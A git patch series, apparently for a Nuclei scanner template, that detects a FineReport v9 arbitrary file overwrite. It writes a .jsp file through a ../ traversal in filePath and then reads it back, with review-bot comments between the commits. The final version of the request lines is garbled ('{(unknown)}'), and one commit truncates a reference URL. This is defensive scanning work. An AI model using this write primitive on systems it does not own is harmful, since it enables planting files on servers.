From 8314db7f2ce274ef2b9b0987ef7131331ddf19ca Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 22 Aug 2023 16:57:51 +0530
Subject: [PATCH 1/5] Create fine-report-v9-file-upload.yaml

---
 .../fine-report-v9-file-upload.yaml | 31 +++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml

diff --git a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml
new file mode 100644
index 0000000000..f96307fe51
--- /dev/null
+++ b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml
@@ -0,0 +1,31 @@
+id: fine-report-v9-file-upload
+
+info:
+  name: FineReport v9 Arbitrary File Overwrite
+  author: SleepingBag945
+  severity: critical
+  reference:
+    - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py
+  tags: apache,solr,lfi
+
+variables:
+  string: '{{rand_base(8, "abc")}}'
+
+http:
+  - raw:
+      - |
+        POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{randstr}}.jsp HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml;charset=UTF-8
+
+        {"__CONTENT__":"{{string}}","__CHARSET__":"UTF-8"}
+
+      - |
+        GET /WebReport/{{randstr}}.jsp HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "{{string}}"

From dfcc100ee02cf9b859af27a10cbe9d995aaab888 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 22 Aug 2023 16:58:57 +0530
Subject: [PATCH 2/5] Update and rename finereport-path-traversal.yaml to finereport-path-traversal.yaml

---
 .../{other => finereport}/finereport-path-traversal.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename http/vulnerabilities/{other => finereport}/finereport-path-traversal.yaml (100%)
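Review bot: The new template's info block declares neither a `description` nor `metadata.max-request`, while the sibling finereport-path-traversal.yaml touched later in this series carries `max-request: 2` under `metadata:`; this template also sends exactly two requests, so add `metadata:` / `  max-request: 2` under info for consistency. A description is worth adding as well, because a confirmed run leaves a `{{randstr}}.jsp` file under /WebReport/ on the target that nothing in the template removes — state that the artifact has to be cleaned up after a hit. The `severity: critical` line has no `classification` block (cvss/cwe) to back it, unlike the sibling template, so consider adding one from the reference rather than leaving the rating unexplained.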
diff --git a/http/vulnerabilities/other/finereport-path-traversal.yaml b/http/vulnerabilities/finereport/finereport-path-traversal.yaml
similarity index 100%
rename from http/vulnerabilities/other/finereport-path-traversal.yaml
rename to http/vulnerabilities/finereport/finereport-path-traversal.yaml
index 7aa815c043..c68ffc17ce 100644
--- a/http/vulnerabilities/other/finereport-path-traversal.yaml
+++ b/http/vulnerabilities/finereport/finereport-path-traversal.yaml
@@ -11,9 +11,9 @@ info:
   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
   cvss-score: 7.5
   cwe-id: CWE-22
-  tags: finereport,lfi
   metadata:
     max-request: 2
+  tags: finereport,lfi
 
 http:
   - method: GET

From 91b994de95c3e0b408007267035d3221beb41f3b Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 22 Aug 2023 17:01:02 +0530
Subject: [PATCH 3/5] updated tags

---
 http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml
index f96307fe51..ba7ab7f797 100644
--- a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml
+++ b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml
@@ -6,7 +6,7 @@ info:
   severity: critical
   reference:
     - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py
-  tags: apache,solr,lfi
+  tags: finereport,fileupload,intrusive
 
 variables:
   string: '{{rand_base(8, "abc")}}'

From 450c8454ff77a579c56312a98e11dd0e4661b3e2 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 22 Aug 2023 17:03:04 +0530
Subject: [PATCH 4/5] Updated metadata

---
 .../finereport/fine-report-v9-file-upload.yaml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml
index ba7ab7f797..d459305d62 100644
--- a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml
+++ b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml
@@ -5,7 +5,9 @@ info:
   author: SleepingBag945
   severity: critical
   reference:
-    - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py
+    - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.
+  metadata:
+    fofa-query: app="帆软-FineReport"
   tags: finereport,fileupload,intrusive
 
 variables:

From 5f712d1d8d77f65c45d40e01689b3a1f1ca50ecd Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Wed, 23 Aug 2023 18:50:56 +0530
Subject: [PATCH 5/5] added filename variable

---
 .../finereport/fine-report-v9-file-upload.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml
index d459305d62..848d31bce2 100644
--- a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml
+++ b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml
@@ -12,18 +12,19 @@ info:
 
 variables:
   string: '{{rand_base(8, "abc")}}'
+  filename: '{{rand_base(8)}}'
 
 http:
   - raw:
       - |
-        POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{randstr}}.jsp HTTP/1.1
+        POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{(unknown)}.jsp HTTP/1.1
         Host: {{Hostname}}
         Content-Type: text/xml;charset=UTF-8
 
         {"__CONTENT__":"{{string}}","__CHARSET__":"UTF-8"}
 
       - |
-        GET /WebReport/{{randstr}}.jsp HTTP/1.1
+        GET /WebReport/{(unknown)}.jsp HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
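Review bot: The rewritten reference line in the `@@ -5,7 +5,9 @@` hunk drops the `.py` suffix, leaving `https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.`, which no longer points at the file the removed line referenced; the commit message only claims a metadata update, so the truncation looks accidental. Restore `    - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py`. The added `metadata:` block still carries no `max-request` entry, although the sibling finereport-path-traversal.yaml in this series declares `max-request: 2` for the same two-request shape, so `    max-request: 2` belongs next to the new `fofa-query` line.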
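Review bot: Both rewritten request lines in the `@@ -12,18 +12,19 @@` hunk read `{(unknown)}` where the variable declared in the same hunk, `filename`, should be interpolated; as printed this is not a `{{...}}` expression, so the POST would write a literal `{(unknown)}.jsp` path, the GET would fetch that same literal, and the new `filename` variable would be unused. If this is how the page rendered rather than what was committed, the intended lines are `POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{filename}}.jsp HTTP/1.1` and `GET /WebReport/{{filename}}.jsp HTTP/1.1`. Whichever form is correct, the two lines must expand to the same name so the second request reads back the file the first one created, which is the whole point of replacing `{{randstr}}` with a declared variable.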